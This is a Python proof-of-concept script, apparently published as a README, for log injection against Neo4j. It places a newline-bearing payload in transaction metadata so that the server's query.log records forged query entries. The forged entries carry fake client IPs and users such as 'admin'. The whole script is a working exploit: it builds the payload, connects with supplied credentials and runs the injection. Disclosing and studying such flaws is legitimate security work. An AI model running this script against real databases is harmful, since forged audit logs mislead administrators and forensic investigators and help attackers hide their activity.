README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Log Injection Proof of Concept
==============================
Usage:
python log_injection_poc.py [--uri URI] [--user USER] [--password PASS]
python log_injection_poc.py --uri bolt://192.168.1.100:7687 --password secret
"""
import argparse
from datetime import datetime
from neo4j import GraphDatabase
def create_fake_query_started(timestamp: str, query_id: str, tx_id: str,
client_ip: str, user: str, query: str,
driver: str) -> str:
"""Create a fake 'Query started:' log entry."""
return (
f"{timestamp}+0000 INFO Query started: id:{query_id} - transaction id:{tx_id} - "
f"0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - "
f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
f"neo4j - {user} - {query} - {{}} - runtime=null - {{}}"
)
def create_fake_completion(timestamp: str, query_id: str, tx_id: str,
client_ip: str, user: str, query: str,
driver: str, duration_ms: int = 1) -> str:
"""Create a fake query completion log entry."""
return (
f"{timestamp}+0000 INFO id:{query_id} - transaction id:{tx_id} - "
f"{duration_ms} ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - "
f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
f"neo4j - {user} - {query} - {{}} - runtime=pipelined - {{}}"
)
def main():
parser = argparse.ArgumentParser(description="Log Injection PoC - Clean Fake Entries")
parser.add_argument("--uri", default="bolt://127.0.0.1:7687",
help="Neo4j URI (default: bolt://127.0.0.1:7687)")
parser.add_argument("--user", default="neo4j", help="Neo4j username (default: neo4j)")
parser.add_argument("--password", default="password123", help="Neo4j password (default: password123)")
args = parser.parse_args()
print("="*40)
print("LOG INJECTION PoC")
print("="*40)
print(f"Target: {args.uri}")
print(f"User: {args.user}")
print()
timestamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
# Realistic driver string
driver_string = "neo4j-python/6.0.3 Python/3.13.9-final-0 (linux)"
# Multiple fake queries to inject - each with unique tx_id to avoid analyzer confusion
fake_queries = [
{
"id": "700", "tx_id": "100", "ip": "10.0.0.1:1337",
"user": "neo4j",
"query": "MATCH (n:FakeQuery1) RETURN n LIMIT 1"
},
{
"id": "701", "tx_id": "101", "ip": "192.168.1.50:4444",
"user": "admin",
"query": "MATCH (n:FakeQuery2) RETURN n LIMIT 1"
},
]
# Build payload with complete fake entries (both start and completion)
# Real queries have: Query started + completion, so we inject both
payload = "'\n" # Close the quote from {x: ' and start new line
# Add Query started entries
for fq in fake_queries:
payload += create_fake_query_started(
timestamp, fq["id"], fq["tx_id"], fq["ip"],
fq["user"], fq["query"], driver_string
) + "\n"
# Add completion entries (no newline after last one to minimize '} artifact)
for i, fq in enumerate(fake_queries):
entry = create_fake_completion(
timestamp, fq["id"], fq["tx_id"], fq["ip"],
fq["user"], fq["query"], driver_string, duration_ms=i+1
)
if i < len(fake_queries) - 1:
payload += entry + "\n"
else:
payload += entry # Last entry - '} will append on same line
print("Injecting fake log entries...")
print("-" * 40)
for fq in fake_queries:
print(f" • {fq['user']}@{fq['ip']}: {fq['query'][:50]}...")
print("-" * 40)
try:
driver = GraphDatabase.driver(args.uri, auth=(args.user, args.password))
# Query BEFORE injection (for comparison in logs) - real query 1
with driver.session() as session:
tx = session.begin_transaction()
tx.run("MATCH (n:RealQuery) RETURN n LIMIT 1").consume()
tx.commit()
print(" Executed: MATCH (n:RealQuery) RETURN n LIMIT 1 (real)")
# The injection query with fake log entries
with driver.session() as session:
tx = session.begin_transaction(metadata={"x": payload})
tx.run("RETURN 1")
tx.commit()
print(" Executed: RETURN 1 (with injected fake entries)")
driver.close()
print()
print("="*40)
print("Check query.log")
return 0
except Exception as e:
print(f"[ERROR] Failed: {e}")
return 1
if __name__ == "__main__":
exit(main())